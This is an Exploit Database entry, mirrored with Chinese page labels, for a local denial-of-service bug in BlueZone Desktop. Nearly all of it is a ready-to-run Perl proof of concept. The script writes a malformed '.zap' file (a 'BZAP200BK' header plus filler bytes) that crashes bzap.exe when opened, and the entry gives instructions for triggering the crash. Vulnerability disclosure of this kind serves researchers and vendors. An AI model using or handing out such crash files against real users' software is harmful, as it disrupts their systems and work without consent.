BlueZone Desktop – ‘.zap’ file Local Denial of Service

• Exploit Database
• 8 阅读

• 作者： Silent_Dream
  日期： 2011-10-15
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17982/

• # Exploit Title: BlueZone Desktop Malformed .zap file Local Denial of Service
  # Date: 10-15-11
  # Author: Silent Dream
  # Software Link: http://www.rocketsoftware.com/bluezone/downloads/desktop-free-trial
  # Version: Latest
  # Tested on: Windows XP SP3
  
  #To trigger: Run this script, double click file to open with bzap.exe, program dies.
  
  my $file = "bluepwn.zap";
  my $head = "BZAP200BK";
  my $junk = "A" x 20;
  
  open($File, ">$file");
  print $File $head.$junk;
  close($FILE);